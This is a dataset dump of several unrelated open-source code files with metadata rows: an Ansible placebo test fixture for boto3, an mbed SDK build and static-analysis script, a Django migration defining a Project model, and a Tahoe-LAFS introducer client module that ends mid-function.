| epl-1.0 | -4,508,145,218,076,429,300 | 32.748603 | 148 | 0.584506 | false |
tumbl3w33d/ansible | test/units/utils/amazon_placebo_fixtures.py | 13 | 6932 | from __future__ import absolute_import, division, print_function
__metaclass__ = type
import errno
import os
import time
import mock
import pytest
boto3 = pytest.importorskip("boto3")
botocore = pytest.importorskip("botocore")
placebo = pytest.importorskip("placebo")
"""
Using Placebo to test modules using boto3:
This is an example test, using the placeboify fixture to test that a module
will fail if resources it depends on don't exist.
> from placebo_fixtures import placeboify, scratch_vpc
>
> def test_create_with_nonexistent_launch_config(placeboify):
> connection = placeboify.client('autoscaling')
> module = FakeModule('test-asg-created', None, min_size=0, max_size=0, desired_capacity=0)
> with pytest.raises(FailJSON) as excinfo:
> asg_module.create_autoscaling_group(connection, module)
> .... asserts based on module state/exceptions ....
In more advanced cases, use unrecorded resource fixtures to fill in ARNs/IDs of
things modules depend on, such as:
> def test_create_in_vpc(placeboify, scratch_vpc):
> connection = placeboify.client('autoscaling')
> module = FakeModule(name='test-asg-created',
> min_size=0, max_size=0, desired_capacity=0,
> availability_zones=[s['az'] for s in scratch_vpc['subnets']],
> vpc_zone_identifier=[s['id'] for s in scratch_vpc['subnets']],
> )
> ..... so on and so forth ....
"""
@pytest.fixture
def placeboify(request, monkeypatch):
"""This fixture puts a recording/replaying harness around `boto3_conn`
Placeboify patches the `boto3_conn` function in ec2 module_utils to return
a boto3 session that in recording or replaying mode, depending on the
PLACEBO_RECORD environment variable. Unset PLACEBO_RECORD (the common case
for just running tests) will put placebo in replay mode, set PLACEBO_RECORD
to any value to turn off replay & operate on real AWS resources.
The recorded sessions are stored in the test file's directory, under the
namespace `placebo_recordings/{testfile name}/{test function name}` to
distinguish them.
"""
session = boto3.Session(region_name='us-west-2')
recordings_path = os.path.join(
request.fspath.dirname,
'placebo_recordings',
request.fspath.basename.replace('.py', ''),
request.function.__name__
# remove the test_ prefix from the function & file name
).replace('test_', '')
if not os.getenv('PLACEBO_RECORD'):
if not os.path.isdir(recordings_path):
raise NotImplementedError('Missing Placebo recordings in directory: %s' % recordings_path)
else:
try:
# make sure the directory for placebo test recordings is available
os.makedirs(recordings_path)
except OSError as e:
if e.errno != errno.EEXIST:
raise
pill = placebo.attach(session, data_path=recordings_path)
if os.getenv('PLACEBO_RECORD'):
pill.record()
else:
pill.playback()
def boto3_middleman_connection(module, conn_type, resource, region='us-west-2', **kwargs):
if conn_type != 'client':
# TODO support resource-based connections
raise ValueError('Mocker only supports client, not %s' % conn_type)
return session.client(resource, region_name=region)
import ansible.module_utils.ec2
monkeypatch.setattr(
ansible.module_utils.ec2,
'boto3_conn',
boto3_middleman_connection,
)
yield session
# tear down
pill.stop()
@pytest.fixture(scope='module')
def basic_launch_config():
"""Create an EC2 launch config whose creation *is not* recorded and return its name
This fixture is module-scoped, since launch configs are immutable and this
can be reused for many tests.
"""
if not os.getenv('PLACEBO_RECORD'):
yield 'pytest_basic_lc'
return
# use a *non recording* session to make the launch config
# since that's a prereq of the ec2_asg module, and isn't what
# we're testing.
asg = boto3.client('autoscaling')
asg.create_launch_configuration(
LaunchConfigurationName='pytest_basic_lc',
ImageId='ami-9be6f38c', # Amazon Linux 2016.09 us-east-1 AMI, can be any valid AMI
SecurityGroups=[],
UserData='#!/bin/bash\necho hello world',
InstanceType='t2.micro',
InstanceMonitoring={'Enabled': False},
AssociatePublicIpAddress=True
)
yield 'pytest_basic_lc'
try:
asg.delete_launch_configuration(LaunchConfigurationName='pytest_basic_lc')
except botocore.exceptions.ClientError as e:
if 'not found' in e.message:
return
raise
@pytest.fixture(scope='module')
def scratch_vpc():
if not os.getenv('PLACEBO_RECORD'):
yield {
'vpc_id': 'vpc-123456',
'cidr_range': '10.0.0.0/16',
'subnets': [
{
'id': 'subnet-123456',
'az': 'us-east-1d',
},
{
'id': 'subnet-654321',
'az': 'us-east-1e',
},
]
}
return
# use a *non recording* session to make the base VPC and subnets
ec2 = boto3.client('ec2')
vpc_resp = ec2.create_vpc(
CidrBlock='10.0.0.0/16',
AmazonProvidedIpv6CidrBlock=False,
)
subnets = (
ec2.create_subnet(
VpcId=vpc_resp['Vpc']['VpcId'],
CidrBlock='10.0.0.0/24',
),
ec2.create_subnet(
VpcId=vpc_resp['Vpc']['VpcId'],
CidrBlock='10.0.1.0/24',
)
)
time.sleep(3)
yield {
'vpc_id': vpc_resp['Vpc']['VpcId'],
'cidr_range': '10.0.0.0/16',
'subnets': [
{
'id': s['Subnet']['SubnetId'],
'az': s['Subnet']['AvailabilityZone'],
} for s in subnets
]
}
try:
for s in subnets:
try:
ec2.delete_subnet(SubnetId=s['Subnet']['SubnetId'])
except botocore.exceptions.ClientError as e:
if 'not found' in e.message:
continue
raise
ec2.delete_vpc(VpcId=vpc_resp['Vpc']['VpcId'])
except botocore.exceptions.ClientError as e:
if 'not found' in e.message:
return
raise
@pytest.fixture(scope='module')
def maybe_sleep():
"""If placebo is reading saved sessions, make sleep always take 0 seconds.
AWS modules often perform polling or retries, but when using recorded
sessions there's no reason to wait. We can still exercise retry and other
code paths without waiting for wall-clock time to pass."""
if not os.getenv('PLACEBO_RECORD'):
p = mock.patch('time.sleep', return_value=None)
p.start()
yield
p.stop()
else:
yield
| gpl-3.0 | -5,258,268,011,027,281,000 | 31.544601 | 102 | 0.613964 | false |
hjjeon0608/mbed_for_W7500P | workspace_tools/build_api.py | 30 | 22655 | """
mbed SDK
Copyright (c) 2011-2013 ARM Limited
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import re
import tempfile
import colorama
from types import ListType
from shutil import rmtree
from os.path import join, exists, basename
from workspace_tools.utils import mkdir, run_cmd, run_cmd_ext
from workspace_tools.paths import MBED_TARGETS_PATH, MBED_LIBRARIES, MBED_API, MBED_HAL, MBED_COMMON
from workspace_tools.targets import TARGET_NAMES, TARGET_MAP
from workspace_tools.libraries import Library
from workspace_tools.toolchains import TOOLCHAIN_CLASSES
from jinja2 import FileSystemLoader
from jinja2.environment import Environment
def build_project(src_path, build_path, target, toolchain_name,
libraries_paths=None, options=None, linker_script=None,
clean=False, notify=None, verbose=False, name=None, macros=None, inc_dirs=None, jobs=1, silent=False):
""" This function builds project. Project can be for example one test / UT
"""
# Toolchain instance
toolchain = TOOLCHAIN_CLASSES[toolchain_name](target, options, notify, macros, silent)
toolchain.VERBOSE = verbose
toolchain.jobs = jobs
toolchain.build_all = clean
src_paths = [src_path] if type(src_path) != ListType else src_path
# We need to remove all paths which are repeated to avoid
# multiple compilations and linking with the same objects
src_paths = [src_paths[0]] + list(set(src_paths[1:]))
PROJECT_BASENAME = basename(src_paths[0])
if name is None:
# We will use default project name based on project folder name
name = PROJECT_BASENAME
toolchain.info("Building project %s (%s, %s)" % (PROJECT_BASENAME.upper(), target.name, toolchain_name))
else:
# User used custom global project name to have the same name for the
toolchain.info("Building project %s to %s (%s, %s)" % (PROJECT_BASENAME.upper(), name, target.name, toolchain_name))
# Scan src_path and libraries_paths for resources
resources = toolchain.scan_resources(src_paths[0])
for path in src_paths[1:]:
resources.add(toolchain.scan_resources(path))
if libraries_paths is not None:
src_paths.extend(libraries_paths)
for path in libraries_paths:
resources.add(toolchain.scan_resources(path))
if linker_script is not None:
resources.linker_script = linker_script
# Build Directory
if clean:
if exists(build_path):
rmtree(build_path)
mkdir(build_path)
# We need to add if necessary additional include directories
if inc_dirs:
if type(inc_dirs) == ListType:
resources.inc_dirs.extend(inc_dirs)
else:
resources.inc_dirs.append(inc_dirs)
# Compile Sources
for path in src_paths:
src = toolchain.scan_resources(path)
objects = toolchain.compile_sources(src, build_path, resources.inc_dirs)
resources.objects.extend(objects)
# Link Program
return toolchain.link_program(resources, build_path, name)
def build_library(src_paths, build_path, target, toolchain_name,
dependencies_paths=None, options=None, name=None, clean=False,
notify=None, verbose=False, macros=None, inc_dirs=None, inc_dirs_ext=None, jobs=1, silent=False):
""" src_path: the path of the source directory
build_path: the path of the build directory
target: ['LPC1768', 'LPC11U24', 'LPC2368']
toolchain: ['ARM', 'uARM', 'GCC_ARM', 'GCC_CS', 'GCC_CR']
library_paths: List of paths to additional libraries
clean: Rebuild everything if True
notify: Notify function for logs
verbose: Write the actual tools command lines if True
inc_dirs: additional include directories which should be included in build
inc_dirs_ext: additional include directories which should be copied to library directory
"""
if type(src_paths) != ListType:
src_paths = [src_paths]
for src_path in src_paths:
if not exists(src_path):
raise Exception("The library source folder does not exist: %s", src_path)
# Toolchain instance
toolchain = TOOLCHAIN_CLASSES[toolchain_name](target, options, macros=macros, notify=notify, silent=silent)
toolchain.VERBOSE = verbose
toolchain.jobs = jobs
toolchain.build_all = clean
# The first path will give the name to the library
name = basename(src_paths[0])
toolchain.info("Building library %s (%s, %s)" % (name.upper(), target.name, toolchain_name))
# Scan Resources
resources = []
for src_path in src_paths:
resources.append(toolchain.scan_resources(src_path))
# Add extra include directories / files which are required by library
# This files usually are not in the same directory as source files so
# previous scan will not include them
if inc_dirs_ext is not None:
for inc_ext in inc_dirs_ext:
resources.append(toolchain.scan_resources(inc_ext))
# Dependencies Include Paths
dependencies_include_dir = []
if dependencies_paths is not None:
for path in dependencies_paths:
lib_resources = toolchain.scan_resources(path)
dependencies_include_dir.extend(lib_resources.inc_dirs)
if inc_dirs:
dependencies_include_dir.extend(inc_dirs)
# Create the desired build directory structure
bin_path = join(build_path, toolchain.obj_path)
mkdir(bin_path)
tmp_path = join(build_path, '.temp', toolchain.obj_path)
mkdir(tmp_path)
# Copy Headers
for resource in resources:
toolchain.copy_files(resource.headers, build_path, rel_path=resource.base_path)
dependencies_include_dir.extend(toolchain.scan_resources(build_path).inc_dirs)
# Compile Sources
objects = []
for resource in resources:
objects.extend(toolchain.compile_sources(resource, tmp_path, dependencies_include_dir))
toolchain.build_library(objects, bin_path, name)
def build_lib(lib_id, target, toolchain, options=None, verbose=False, clean=False, macros=None, notify=None, jobs=1, silent=False):
""" Wrapper for build_library function.
Function builds library in proper directory using all dependencies and macros defined by user.
"""
lib = Library(lib_id)
if lib.is_supported(target, toolchain):
# We need to combine macros from parameter list with macros from library definition
MACROS = lib.macros if lib.macros else []
if macros:
MACROS.extend(macros)
build_library(lib.source_dir, lib.build_dir, target, toolchain, lib.dependencies, options,
verbose=verbose,
silent=silent,
clean=clean,
macros=MACROS,
notify=notify,
inc_dirs=lib.inc_dirs,
inc_dirs_ext=lib.inc_dirs_ext,
jobs=jobs)
else:
print 'Library "%s" is not yet supported on target %s with toolchain %s' % (lib_id, target.name, toolchain)
# We do have unique legacy conventions about how we build and package the mbed library
def build_mbed_libs(target, toolchain_name, options=None, verbose=False, clean=False, macros=None, notify=None, jobs=1, silent=False):
""" Function returns True is library was built and false if building was skipped """
# Check toolchain support
if toolchain_name not in target.supported_toolchains:
supported_toolchains_text = ", ".join(target.supported_toolchains)
print '%s target is not yet supported by toolchain %s' % (target.name, toolchain_name)
print '%s target supports %s toolchain%s' % (target.name, supported_toolchains_text, 's' if len(target.supported_toolchains) > 1 else '')
return False
# Toolchain
toolchain = TOOLCHAIN_CLASSES[toolchain_name](target, options, macros=macros, notify=notify, silent=silent)
toolchain.VERBOSE = verbose
toolchain.jobs = jobs
toolchain.build_all = clean
# Source and Build Paths
BUILD_TARGET = join(MBED_LIBRARIES, "TARGET_" + target.name)
BUILD_TOOLCHAIN = join(BUILD_TARGET, "TOOLCHAIN_" + toolchain.name)
mkdir(BUILD_TOOLCHAIN)
TMP_PATH = join(MBED_LIBRARIES, '.temp', toolchain.obj_path)
mkdir(TMP_PATH)
# CMSIS
toolchain.info("Building library %s (%s, %s)"% ('CMSIS', target.name, toolchain_name))
cmsis_src = join(MBED_TARGETS_PATH, "cmsis")
resources = toolchain.scan_resources(cmsis_src)
toolchain.copy_files(resources.headers, BUILD_TARGET)
toolchain.copy_files(resources.linker_script, BUILD_TOOLCHAIN)
toolchain.copy_files(resources.bin_files, BUILD_TOOLCHAIN)
objects = toolchain.compile_sources(resources, TMP_PATH)
toolchain.copy_files(objects, BUILD_TOOLCHAIN)
# mbed
toolchain.info("Building library %s (%s, %s)" % ('MBED', target.name, toolchain_name))
# Common Headers
toolchain.copy_files(toolchain.scan_resources(MBED_API).headers, MBED_LIBRARIES)
toolchain.copy_files(toolchain.scan_resources(MBED_HAL).headers, MBED_LIBRARIES)
# Target specific sources
HAL_SRC = join(MBED_TARGETS_PATH, "hal")
hal_implementation = toolchain.scan_resources(HAL_SRC)
toolchain.copy_files(hal_implementation.headers + hal_implementation.hex_files + hal_implementation.libraries, BUILD_TARGET, HAL_SRC)
incdirs = toolchain.scan_resources(BUILD_TARGET).inc_dirs
objects = toolchain.compile_sources(hal_implementation, TMP_PATH, [MBED_LIBRARIES] + incdirs)
# Common Sources
mbed_resources = toolchain.scan_resources(MBED_COMMON)
objects += toolchain.compile_sources(mbed_resources, TMP_PATH, [MBED_LIBRARIES] + incdirs)
# A number of compiled files need to be copied as objects as opposed to
# being part of the mbed library, for reasons that have to do with the way
# the linker search for symbols in archives. These are:
# - retarget.o: to make sure that the C standard lib symbols get overridden
# - board.o: mbed_die is weak
# - mbed_overrides.o: this contains platform overrides of various weak SDK functions
separate_names, separate_objects = ['retarget.o', 'board.o', 'mbed_overrides.o'], []
for o in objects:
for name in separate_names:
if o.endswith(name):
separate_objects.append(o)
for o in separate_objects:
objects.remove(o)
toolchain.build_library(objects, BUILD_TOOLCHAIN, "mbed")
for o in separate_objects:
toolchain.copy_files(o, BUILD_TOOLCHAIN)
return True
def get_unique_supported_toolchains():
""" Get list of all unique toolchains supported by targets """
unique_supported_toolchains = []
for target in TARGET_NAMES:
for toolchain in TARGET_MAP[target].supported_toolchains:
if toolchain not in unique_supported_toolchains:
unique_supported_toolchains.append(toolchain)
return unique_supported_toolchains
def mcu_toolchain_matrix(verbose_html=False, platform_filter=None):
""" Shows target map using prettytable """
unique_supported_toolchains = get_unique_supported_toolchains()
from prettytable import PrettyTable # Only use it in this function so building works without extra modules
# All tests status table print
columns = ["Platform"] + unique_supported_toolchains
pt = PrettyTable(["Platform"] + unique_supported_toolchains)
# Align table
for col in columns:
pt.align[col] = "c"
pt.align["Platform"] = "l"
perm_counter = 0
target_counter = 0
for target in sorted(TARGET_NAMES):
if platform_filter is not None:
# FIlter out platforms using regex
if re.search(platform_filter, target) is None:
continue
target_counter += 1
row = [target] # First column is platform name
default_toolchain = TARGET_MAP[target].default_toolchain
for unique_toolchain in unique_supported_toolchains:
text = "-"
if default_toolchain == unique_toolchain:
text = "Default"
perm_counter += 1
elif unique_toolchain in TARGET_MAP[target].supported_toolchains:
text = "Supported"
perm_counter += 1
row.append(text)
pt.add_row(row)
result = pt.get_html_string() if verbose_html else pt.get_string()
result += "\n"
result += "*Default - default on-line compiler\n"
result += "*Supported - supported off-line compiler\n"
result += "\n"
result += "Total platforms: %d\n"% (target_counter)
result += "Total permutations: %d"% (perm_counter)
return result
def get_target_supported_toolchains(target):
""" Returns target supported toolchains list """
return TARGET_MAP[target].supported_toolchains if target in TARGET_MAP else None
def static_analysis_scan(target, toolchain_name, CPPCHECK_CMD, CPPCHECK_MSG_FORMAT, options=None, verbose=False, clean=False, macros=None, notify=None, jobs=1):
# Toolchain
toolchain = TOOLCHAIN_CLASSES[toolchain_name](target, options, macros=macros, notify=notify)
toolchain.VERBOSE = verbose
toolchain.jobs = jobs
toolchain.build_all = clean
# Source and Build Paths
BUILD_TARGET = join(MBED_LIBRARIES, "TARGET_" + target.name)
BUILD_TOOLCHAIN = join(BUILD_TARGET, "TOOLCHAIN_" + toolchain.name)
mkdir(BUILD_TOOLCHAIN)
TMP_PATH = join(MBED_LIBRARIES, '.temp', toolchain.obj_path)
mkdir(TMP_PATH)
# CMSIS
toolchain.info("Static analysis for %s (%s, %s)" % ('CMSIS', target.name, toolchain_name))
cmsis_src = join(MBED_TARGETS_PATH, "cmsis")
resources = toolchain.scan_resources(cmsis_src)
# Copy files before analysis
toolchain.copy_files(resources.headers, BUILD_TARGET)
toolchain.copy_files(resources.linker_script, BUILD_TOOLCHAIN)
# Gather include paths, c, cpp sources and macros to transfer to cppcheck command line
includes = ["-I%s"% i for i in resources.inc_dirs]
includes.append("-I%s"% str(BUILD_TARGET))
c_sources = " ".join(resources.c_sources)
cpp_sources = " ".join(resources.cpp_sources)
macros = ["-D%s"% s for s in toolchain.get_symbols() + toolchain.macros]
includes = map(str.strip, includes)
macros = map(str.strip, macros)
check_cmd = CPPCHECK_CMD
check_cmd += CPPCHECK_MSG_FORMAT
check_cmd += includes
check_cmd += macros
# We need to pass some params via file to avoid "command line too long in some OSs"
tmp_file = tempfile.NamedTemporaryFile(delete=False)
tmp_file.writelines(line + '\n' for line in c_sources.split())
tmp_file.writelines(line + '\n' for line in cpp_sources.split())
tmp_file.close()
check_cmd += ["--file-list=%s"% tmp_file.name]
_stdout, _stderr, _rc = run_cmd(check_cmd)
if verbose:
print _stdout
print _stderr
# =========================================================================
# MBED
toolchain.info("Static analysis for %s (%s, %s)" % ('MBED', target.name, toolchain_name))
# Common Headers
toolchain.copy_files(toolchain.scan_resources(MBED_API).headers, MBED_LIBRARIES)
toolchain.copy_files(toolchain.scan_resources(MBED_HAL).headers, MBED_LIBRARIES)
# Target specific sources
HAL_SRC = join(MBED_TARGETS_PATH, "hal")
hal_implementation = toolchain.scan_resources(HAL_SRC)
# Copy files before analysis
toolchain.copy_files(hal_implementation.headers + hal_implementation.hex_files, BUILD_TARGET, HAL_SRC)
incdirs = toolchain.scan_resources(BUILD_TARGET)
target_includes = ["-I%s" % i for i in incdirs.inc_dirs]
target_includes.append("-I%s"% str(BUILD_TARGET))
target_includes.append("-I%s"% str(HAL_SRC))
target_c_sources = " ".join(incdirs.c_sources)
target_cpp_sources = " ".join(incdirs.cpp_sources)
target_macros = ["-D%s"% s for s in toolchain.get_symbols() + toolchain.macros]
# Common Sources
mbed_resources = toolchain.scan_resources(MBED_COMMON)
# Gather include paths, c, cpp sources and macros to transfer to cppcheck command line
mbed_includes = ["-I%s" % i for i in mbed_resources.inc_dirs]
mbed_includes.append("-I%s"% str(BUILD_TARGET))
mbed_includes.append("-I%s"% str(MBED_COMMON))
mbed_includes.append("-I%s"% str(MBED_API))
mbed_includes.append("-I%s"% str(MBED_HAL))
mbed_c_sources = " ".join(mbed_resources.c_sources)
mbed_cpp_sources = " ".join(mbed_resources.cpp_sources)
target_includes = map(str.strip, target_includes)
mbed_includes = map(str.strip, mbed_includes)
target_macros = map(str.strip, target_macros)
check_cmd = CPPCHECK_CMD
check_cmd += CPPCHECK_MSG_FORMAT
check_cmd += target_includes
check_cmd += mbed_includes
check_cmd += target_macros
# We need to pass some parames via file to avoid "command line too long in some OSs"
tmp_file = tempfile.NamedTemporaryFile(delete=False)
tmp_file.writelines(line + '\n' for line in target_c_sources.split())
tmp_file.writelines(line + '\n' for line in target_cpp_sources.split())
tmp_file.writelines(line + '\n' for line in mbed_c_sources.split())
tmp_file.writelines(line + '\n' for line in mbed_cpp_sources.split())
tmp_file.close()
check_cmd += ["--file-list=%s"% tmp_file.name]
_stdout, _stderr, _rc = run_cmd_ext(check_cmd)
if verbose:
print _stdout
print _stderr
def static_analysis_scan_lib(lib_id, target, toolchain, cppcheck_cmd, cppcheck_msg_format,
options=None, verbose=False, clean=False, macros=None, notify=None, jobs=1):
lib = Library(lib_id)
if lib.is_supported(target, toolchain):
static_analysis_scan_library(lib.source_dir, lib.build_dir, target, toolchain, cppcheck_cmd, cppcheck_msg_format,
lib.dependencies, options,
verbose=verbose, clean=clean, macros=macros, notify=notify, jobs=jobs)
else:
print 'Library "%s" is not yet supported on target %s with toolchain %s'% (lib_id, target.name, toolchain)
def static_analysis_scan_library(src_paths, build_path, target, toolchain_name, cppcheck_cmd, cppcheck_msg_format,
dependencies_paths=None, options=None, name=None, clean=False,
notify=None, verbose=False, macros=None, jobs=1):
""" Function scans library (or just some set of sources/headers) for staticly detectable defects """
if type(src_paths) != ListType:
src_paths = [src_paths]
for src_path in src_paths:
if not exists(src_path):
raise Exception("The library source folder does not exist: %s", src_path)
# Toolchain instance
toolchain = TOOLCHAIN_CLASSES[toolchain_name](target, options, macros=macros, notify=notify)
toolchain.VERBOSE = verbose
toolchain.jobs = jobs
# The first path will give the name to the library
name = basename(src_paths[0])
toolchain.info("Static analysis for library %s (%s, %s)" % (name.upper(), target.name, toolchain_name))
# Scan Resources
resources = []
for src_path in src_paths:
resources.append(toolchain.scan_resources(src_path))
# Dependencies Include Paths
dependencies_include_dir = []
if dependencies_paths is not None:
for path in dependencies_paths:
lib_resources = toolchain.scan_resources(path)
dependencies_include_dir.extend(lib_resources.inc_dirs)
# Create the desired build directory structure
bin_path = join(build_path, toolchain.obj_path)
mkdir(bin_path)
tmp_path = join(build_path, '.temp', toolchain.obj_path)
mkdir(tmp_path)
# Gather include paths, c, cpp sources and macros to transfer to cppcheck command line
includes = ["-I%s" % i for i in dependencies_include_dir + src_paths]
c_sources = " "
cpp_sources = " "
macros = ['-D%s' % s for s in toolchain.get_symbols() + toolchain.macros]
# Copy Headers
for resource in resources:
toolchain.copy_files(resource.headers, build_path, rel_path=resource.base_path)
includes += ["-I%s" % i for i in resource.inc_dirs]
c_sources += " ".join(resource.c_sources) + " "
cpp_sources += " ".join(resource.cpp_sources) + " "
dependencies_include_dir.extend(toolchain.scan_resources(build_path).inc_dirs)
includes = map(str.strip, includes)
macros = map(str.strip, macros)
check_cmd = cppcheck_cmd
check_cmd += cppcheck_msg_format
check_cmd += includes
check_cmd += macros
# We need to pass some parameters via file to avoid "command line too long in some OSs"
# Temporary file is created to store e.g. cppcheck list of files for command line
tmp_file = tempfile.NamedTemporaryFile(delete=False)
tmp_file.writelines(line + '\n' for line in c_sources.split())
tmp_file.writelines(line + '\n' for line in cpp_sources.split())
tmp_file.close()
check_cmd += ["--file-list=%s"% tmp_file.name]
# This will allow us to grab result from both stdio and stderr outputs (so we can show them)
# We assume static code analysis tool is outputting defects on STDERR
_stdout, _stderr, _rc = run_cmd_ext(check_cmd)
if verbose:
print _stdout
print _stderr
def print_build_results(result_list, build_name):
""" Generate result string for build results """
result = ""
if len(result_list) > 0:
result += build_name + "\n"
result += "\n".join([" * %s" % f for f in result_list])
result += "\n"
return result
def write_build_report(build_report, template_filename, filename):
build_report_failing = []
build_report_passing = []
for report in build_report:
if len(report["failing"]) > 0:
build_report_failing.append(report)
else:
build_report_passing.append(report)
env = Environment(extensions=['jinja2.ext.with_'])
env.loader = FileSystemLoader('ci_templates')
template = env.get_template(template_filename)
with open(filename, 'w+') as f:
f.write(template.render(failing_builds=build_report_failing, passing_builds=build_report_passing))
| apache-2.0 | 8,446,815,926,178,976,000 | 40.190909 | 160 | 0.675127 | false |
iannesbitt/iannesbitt.org | main/migrations/0001_initial.py | 1 | 1118 | # -*- coding: utf-8 -*-
# Generated by Django 1.9.7 on 2016-07-24 03:20
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Project',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=200)),
('description', models.CharField(max_length=500)),
('url', models.URLField()),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
| mpl-2.0 | -5,663,240,715,749,562,000 | 33.9375 | 120 | 0.620751 | false |
sspreitzer/tahoe-lafs | src/allmydata/introducer/client.py | 6 | 16218 |
import time
from zope.interface import implements
from twisted.application import service
from foolscap.api import Referenceable, eventually, RemoteInterface
from allmydata.interfaces import InsufficientVersionError
from allmydata.introducer.interfaces import IIntroducerClient, \
RIIntroducerSubscriberClient_v1, RIIntroducerSubscriberClient_v2
from allmydata.introducer.common import sign_to_foolscap, unsign_from_foolscap,\
convert_announcement_v1_to_v2, convert_announcement_v2_to_v1, \
make_index, get_tubid_string_from_ann, get_tubid_string
from allmydata.util import log
from allmydata.util.rrefutil import add_version_to_remote_reference
from allmydata.util.keyutil import BadSignatureError
class WrapV2ClientInV1Interface(Referenceable): # for_v1
"""I wrap a v2 IntroducerClient to make it look like a v1 client, so it
can be attached to an old server."""
implements(RIIntroducerSubscriberClient_v1)
def __init__(self, original):
self.original = original
def remote_announce(self, announcements):
lp = self.original.log("received %d announcements (v1)" %
len(announcements))
anns_v1 = set([convert_announcement_v1_to_v2(ann_v1)
for ann_v1 in announcements])
return self.original.got_announcements(anns_v1, lp)
def remote_set_encoding_parameters(self, parameters):
self.original.remote_set_encoding_parameters(parameters)
class RIStubClient(RemoteInterface): # for_v1
"""Each client publishes a service announcement for a dummy object called
the StubClient. This object doesn't actually offer any services, but the
announcement helps the Introducer keep track of which clients are
subscribed (so the grid admin can keep track of things like the size of
the grid and the client versions in use. This is the (empty)
RemoteInterface for the StubClient."""
class StubClient(Referenceable): # for_v1
implements(RIStubClient)
V1 = "http://allmydata.org/tahoe/protocols/introducer/v1"
V2 = "http://allmydata.org/tahoe/protocols/introducer/v2"
class IntroducerClient(service.Service, Referenceable):
implements(RIIntroducerSubscriberClient_v2, IIntroducerClient)
def __init__(self, tub, introducer_furl,
nickname, my_version, oldest_supported,
app_versions, sequencer):
self._tub = tub
self.introducer_furl = introducer_furl
assert type(nickname) is unicode
self._nickname = nickname
self._my_version = my_version
self._oldest_supported = oldest_supported
self._app_versions = app_versions
self._sequencer = sequencer
self._my_subscriber_info = { "version": 0,
"nickname": self._nickname,
"app-versions": self._app_versions,
"my-version": self._my_version,
"oldest-supported": self._oldest_supported,
}
self._stub_client = None # for_v1
self._stub_client_furl = None
self._outbound_announcements = {} # not signed
self._published_announcements = {} # signed
self._canary = Referenceable()
self._publisher = None
self._local_subscribers = [] # (servicename,cb,args,kwargs) tuples
self._subscribed_service_names = set()
self._subscriptions = set() # requests we've actually sent
# _inbound_announcements remembers one announcement per
# (servicename,serverid) pair. Anything that arrives with the same
# pair will displace the previous one. This stores tuples of
# (unpacked announcement dictionary, verifyingkey, rxtime). The ann
# dicts can be compared for equality to distinguish re-announcement
# from updates. It also provides memory for clients who subscribe
# after startup.
self._inbound_announcements = {}
self.encoding_parameters = None
# hooks for unit tests
self._debug_counts = {
"inbound_message": 0,
"inbound_announcement": 0,
"wrong_service": 0,
"duplicate_announcement": 0,
"update": 0,
"new_announcement": 0,
"outbound_message": 0,
}
self._debug_outstanding = 0
def _debug_retired(self, res):
self._debug_outstanding -= 1
return res
def startService(self):
service.Service.startService(self)
self._introducer_error = None
rc = self._tub.connectTo(self.introducer_furl, self._got_introducer)
self._introducer_reconnector = rc
def connect_failed(failure):
self.log("Initial Introducer connection failed: perhaps it's down",
level=log.WEIRD, failure=failure, umid="c5MqUQ")
d = self._tub.getReference(self.introducer_furl)
d.addErrback(connect_failed)
def _got_introducer(self, publisher):
self.log("connected to introducer, getting versions")
default = { "http://allmydata.org/tahoe/protocols/introducer/v1":
{ },
"application-version": "unknown: no get_version()",
}
d = add_version_to_remote_reference(publisher, default)
d.addCallback(self._got_versioned_introducer)
d.addErrback(self._got_error)
def _got_error(self, f):
# TODO: for the introducer, perhaps this should halt the application
self._introducer_error = f # polled by tests
def _got_versioned_introducer(self, publisher):
self.log("got introducer version: %s" % (publisher.version,))
# we require an introducer that speaks at least one of (V1, V2)
if not (V1 in publisher.version or V2 in publisher.version):
raise InsufficientVersionError("V1 or V2", publisher.version)
self._publisher = publisher
publisher.notifyOnDisconnect(self._disconnected)
self._maybe_publish()
self._maybe_subscribe()
def _disconnected(self):
self.log("bummer, we've lost our connection to the introducer")
self._publisher = None
self._subscriptions.clear()
def log(self, *args, **kwargs):
if "facility" not in kwargs:
kwargs["facility"] = "tahoe.introducer.client"
return log.msg(*args, **kwargs)
def subscribe_to(self, service_name, cb, *args, **kwargs):
self._local_subscribers.append( (service_name,cb,args,kwargs) )
self._subscribed_service_names.add(service_name)
self._maybe_subscribe()
for index,(ann,key_s,when) in self._inbound_announcements.items():
servicename = index[0]
if servicename == service_name:
eventually(cb, key_s, ann, *args, **kwargs)
def _maybe_subscribe(self):
if not self._publisher:
self.log("want to subscribe, but no introducer yet",
level=log.NOISY)
return
for service_name in self._subscribed_service_names:
if service_name in self._subscriptions:
continue
self._subscriptions.add(service_name)
if V2 in self._publisher.version:
self._debug_outstanding += 1
d = self._publisher.callRemote("subscribe_v2",
self, service_name,
self._my_subscriber_info)
d.addBoth(self._debug_retired)
else:
d = self._subscribe_handle_v1(service_name) # for_v1
d.addErrback(log.err, facility="tahoe.introducer.client",
level=log.WEIRD, umid="2uMScQ")
def _subscribe_handle_v1(self, service_name): # for_v1
# they don't speak V2: must be a v1 introducer. Fall back to the v1
# 'subscribe' method, using a client adapter.
ca = WrapV2ClientInV1Interface(self)
self._debug_outstanding += 1
d = self._publisher.callRemote("subscribe", ca, service_name)
d.addBoth(self._debug_retired)
# We must also publish an empty 'stub_client' object, so the
# introducer can count how many clients are connected and see what
# versions they're running.
if not self._stub_client_furl:
self._stub_client = sc = StubClient()
self._stub_client_furl = self._tub.registerReference(sc)
def _publish_stub_client(ignored):
furl = self._stub_client_furl
self.publish("stub_client",
{ "anonymous-storage-FURL": furl,
"permutation-seed-base32": get_tubid_string(furl),
})
